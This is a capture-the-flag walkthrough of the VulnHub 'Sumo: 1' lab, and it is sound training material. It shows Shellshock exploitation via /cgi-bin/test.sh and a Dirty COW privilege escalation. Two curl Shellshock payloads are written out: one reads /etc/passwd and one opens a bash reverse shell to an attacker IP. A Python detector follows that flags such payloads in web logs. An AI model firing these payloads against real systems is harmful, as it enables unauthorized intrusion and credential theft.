Sumo : 1


https://www.vulnhub.com/entry/sumo-1,480/


Review

  • Enumeration indicates the possibility of a Shellshock exploit
  • Scan and test for the Shellshock vulnerability
  • Use Shellshock to get a reverse shell
  • Linux enumeration indicates the kernel is outdated
  • Use a known exploit for the outdated kernel, such as Dirty COW, to gain privileged access

Enumeration

Run an nmap scan to find open ports.

Port 80

Run a gobuster scan to find hidden directories.

/cgi-bin/ returns a 403 status. Run another scan on it.

/cgi-bin/ is known to be associated with the Shellshock vulnerability, so use an nmap script to check whether the test script is vulnerable.

Vulnerability found.

Let’s test it by sending a Shellshock payload to the script.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://192.168.18.12:80/cgi-bin/test.sh

Inject a reverse shell via the Shellshock-vulnerable script.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.18.2/1234 0>&1'" http://192.168.18.12/cgi-bin/test.sh
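The two curl requests above work because the CGI handler copies the User-Agent header into an environment variable before bash interprets it, so the "() { :; };" prefix is treated as a function definition and everything after it runs. From the defender's side the same prefix is the signature to hunt for. The following script is an added example, not part of the original walkthrough: it parses Apache "combined" format access-log lines (the sample lines are constructed here, not taken from the box) and flags any request whose User-Agent, Referer or request line starts a bash function definition, reporting the source IP, timestamp, path and the header that carried it.

```python
import re

# Constructed sample access-log lines in Apache "combined" format (not from the original post).
# Lines 2 and 4 carry Shellshock-style payloads; lines 1 and 3 are benign.
SAMPLE_LOG = """\
192.168.18.2 - - [10/Mar/2020:10:01:01 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.18.2 - - [10/Mar/2020:10:01:05 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 200 512 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
192.168.18.2 - - [10/Mar/2020:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.68.0"
192.168.18.2 - - [10/Mar/2020:10:01:12 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 200 512 "() { :;}; /bin/sleep 5" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A Shellshock payload starts with a bash function definition: "() {".
# Whitespace is optional so "() {", "(){" and "() { :;}" all trigger.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Any header the CGI gateway exports as an environment variable is a carrier;
# User-Agent and Referer are the classic ones, and the request line covers query strings.
CARRIER_FIELDS = ("ua", "referer", "request")


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def request_path(request):
    """Extract the path from a request line such as 'GET /cgi-bin/test.sh HTTP/1.1'."""
    parts = request.split(" ")
    return parts[1] if len(parts) >= 2 else request


def find_shellshock_attempts(log_text):
    """Scan log text and return one finding per line carrying a Shellshock-style payload."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for field in CARRIER_FIELDS:
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({
                    "ip": rec["ip"],
                    "ts": rec["ts"],
                    "path": request_path(rec["request"]),
                    "field": field,
                    "value": rec[field],
                })
                break  # one finding per line is enough
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['path']} via {hit['field']}: {hit['value']}")
```

The detection key here is the function-definition prefix rather than any particular command after it, so it also catches variants that use a different header or a different payload body. On a real server the same pattern is worth feeding into the web application firewall or log pipeline, and the durable fix is the patched bash package plus removing unused CGI scripts from /cgi-bin/.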

Foothold

User access gained.

Upload linpeas to look for clues.

The Linux kernel is outdated.

Searching online for exploits against this kernel version shows that the Dirty COW exploit can be used.

Upload the exploit to the victim machine.

Got an error compiling the code.

A Google search suggests fixing the PATH variable so the compiler and its helper binaries can be found.

PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH

Privilege escalation

A new account is created.

Switch to the new user.

Root flag is found.
